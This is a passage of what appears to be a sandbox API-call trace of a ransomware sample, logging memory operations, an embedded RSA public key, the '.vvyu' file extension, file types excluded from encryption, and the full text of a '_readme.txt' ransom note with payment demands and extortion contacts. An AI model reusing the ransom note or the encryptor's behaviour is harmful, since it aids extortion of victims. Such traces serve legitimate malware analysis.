KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2cce648, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0172.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5f0) returned 0x2ccec40 [0172.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0172.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 [0172.822] lstrcpyA (in: lpString1=0x6d8fe0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0172.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccec40 | out: hHeap=0x6a0000) returned 1 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fb88 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x2cc0aa0 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3df28 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3e190 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3e3f8 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3e660 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3e8c8 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3eb30 [0172.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3ed98 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3f000 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3f268 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3f4d0 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x816) returned 0x2cce648 [0172.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cce648, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2ccee68 [0172.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x2cc0950 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c4fb80 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c4fde8 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c50050 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c502b8 [0172.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c50520 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c50788 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c509f0 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c50c58 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c50ec0 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51128 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x130) returned 0x6d5c88 [0172.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0172.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1d0) returned 0x2c4afd0 [0172.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0172.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2b7) returned 0x2ccdc28 [0172.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0172.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x412) returned 0x2cce648 [0172.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 [0172.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x61a) returned 0x2ccf690 [0172.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0172.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x440) returned 0x2ccdc28 [0172.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1068) returned 0x2cc48a0 [0172.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ccdc28, cbMultiByte=-1, lpWideCharStr=0x2cc48a0, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0172.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1070) returned 0x2cc5910 [0172.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc48a0 | out: hHeap=0x6a0000) returned 1 [0172.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x2cc0b30 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51390 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c515f8 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51860 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51ac8 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51d30 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c51f98 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c52200 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c52468 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c526d0 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c52938 [0172.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80a) returned 0x2cce648 [0172.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cce648, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc48a0 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4efe0 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6c6348 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x6e9040 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6348 | out: hHeap=0x6a0000) returned 1 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fc58 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x48) returned 0x2c767f0 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9040 | out: hHeap=0x6a0000) returned 1 [0172.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9ed30 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fcc0 [0172.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c767f0 | out: hHeap=0x6a0000) returned 1 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2c1cfc8 [0172.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fcc0 | out: hHeap=0x6a0000) returned 1 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9ed78 [0172.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd8) returned 0x762c90 [0172.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c1cfc8 | out: hHeap=0x6a0000) returned 1 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4efb8 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fcc0 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x138) returned 0x6d5c88 [0172.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762c90 | out: hHeap=0x6a0000) returned 1 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9edc0 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82900 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82958 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9ee08 [0172.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c8) returned 0x2c4afd0 [0172.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0172.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4efe0 | out: hHeap=0x6a0000) returned 1 [0172.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0172.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fc58 | out: hHeap=0x6a0000) returned 1 [0172.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9ed30 | out: hHeap=0x6a0000) returned 1 [0172.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0172.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0172.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9ed78 | out: hHeap=0x6a0000) returned 1 [0172.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4efb8 | out: hHeap=0x6a0000) returned 1 [0172.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fcc0 | out: hHeap=0x6a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9edc0 | out: hHeap=0x6a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82900 | out: hHeap=0x6a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82958 | out: hHeap=0x6a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9ee08 | out: hHeap=0x6a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x2cc0ad0 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c52ba0 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c52e08 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c53070 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c532d8 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c53540 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c537a8 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c5f380 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c5f5e8 [0172.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c5f850 [0172.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c5fab8 [0172.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0172.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x130) returned 0x6d5c88 [0172.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1d0) returned 0x2c4afd0 [0172.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2b7) returned 0x2ccfcb8 [0172.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0172.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x412) returned 0x2ccdc28 [0172.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccfcb8 | out: hHeap=0x6a0000) returned 1 [0172.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x61a) returned 0x2cce648 [0172.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 [0172.840] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0172.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x590) returned 0x2ccdc28 [0172.842] GetLastError () returned 0x0 [0172.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x81e) returned 0x2cc50b8 [0172.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0172.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc7a88 [0172.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ac8 [0172.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6348 | out: hHeap=0x6a0000) returned 1 [0172.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x81e) returned 0x2cc50b8 [0172.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0172.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc82b0 [0172.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x48) returned 0x2c767f0 [0172.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ac8 | out: hHeap=0x6a0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x814) returned 0x2cc50b8 [0172.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0172.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc8ad8 [0172.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fcc0 [0172.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c767f0 | out: hHeap=0x6a0000) returned 1 [0172.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0172.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc9300 [0172.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2c1cfc8 [0172.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fcc0 | out: hHeap=0x6a0000) returned 1 [0172.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0172.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc9b18 [0172.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0172.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cca330 [0172.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd8) returned 0x762c90 [0172.871] HeapFree (in: hHeap=0x6a0000, 